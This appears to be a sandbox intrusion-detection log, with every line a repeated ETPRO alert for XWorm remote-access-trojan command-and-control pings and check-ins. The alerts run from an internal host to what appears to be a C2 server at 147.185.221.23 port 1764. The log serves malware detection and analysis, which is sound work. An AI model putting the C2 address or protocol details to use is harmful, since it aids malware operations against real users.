                                                                                        2024-10-13T19:12:33.075007+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.075007+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.095840+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.095840+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.187899+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.187899+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.209923+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.209923+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.321634+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.321634+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.333437+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.333437+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.447112+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.447112+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.458553+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.458553+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.580065+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.580065+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.599794+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.599794+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.705830+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.705830+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.735832+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.735832+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.834460+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.834460+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.847627+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.847627+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.971928+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.971928+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.997623+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:33.997623+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.161227+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.161227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.178627+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.178627+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.304281+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.304281+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.319610+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.319610+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.471841+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.471841+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.474553+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.474553+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.580343+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.580343+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.587500+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.587500+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.705441+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.705441+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.708656+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.708656+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.824783+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.824783+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.828536+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:34.828536+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.002318+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.002318+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.002442+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.002442+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.300151+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.300151+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.300285+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.300285+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.915475+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.915475+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.921440+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:35.921440+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.056195+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.056195+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.083186+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.083186+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.194727+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.194727+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.217021+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.217021+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.343022+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.343022+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.355244+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.355244+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.522191+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.522191+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.522288+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.522288+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.666956+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.666956+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.667007+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.667007+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.790960+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.790960+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.838304+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.838304+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.974323+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.974323+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.978009+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:36.978009+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.353794+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.353794+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.358012+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.358012+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.520875+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.520875+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.526507+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.526507+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.669851+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.669851+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.679665+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.679665+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.811597+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.811597+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.885657+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:37.885657+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.010070+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.010070+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.013906+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.013906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.137365+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.137365+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.147705+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.147705+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.302499+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.302499+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.326238+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.326238+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.514720+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.514720+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.668937+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.668937+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.994227+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:38.994227+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.003587+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.003587+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.110804+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.110804+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.118359+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.118359+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.247152+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.247152+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.261605+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.261605+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.498134+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.498134+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.514561+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.514561+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.779265+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.779265+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.830215+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.830215+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.914996+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.914996+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.954359+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:39.954359+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.114304+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.114304+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.123679+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.123679+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.267196+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.267196+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.369733+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.369733+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.428767+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.428767+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.505626+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.505626+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.548144+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.548144+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.625569+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.625569+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.658480+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.658480+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.735823+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.735823+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.779847+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.779847+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.843779+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.843779+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.891638+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.891638+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550013147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.969974+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:40.969974+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550012147.185.221.231764TCP
                                                                                        2024-10-13T19:12:41.011378+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550013147.185.221.231764TCP
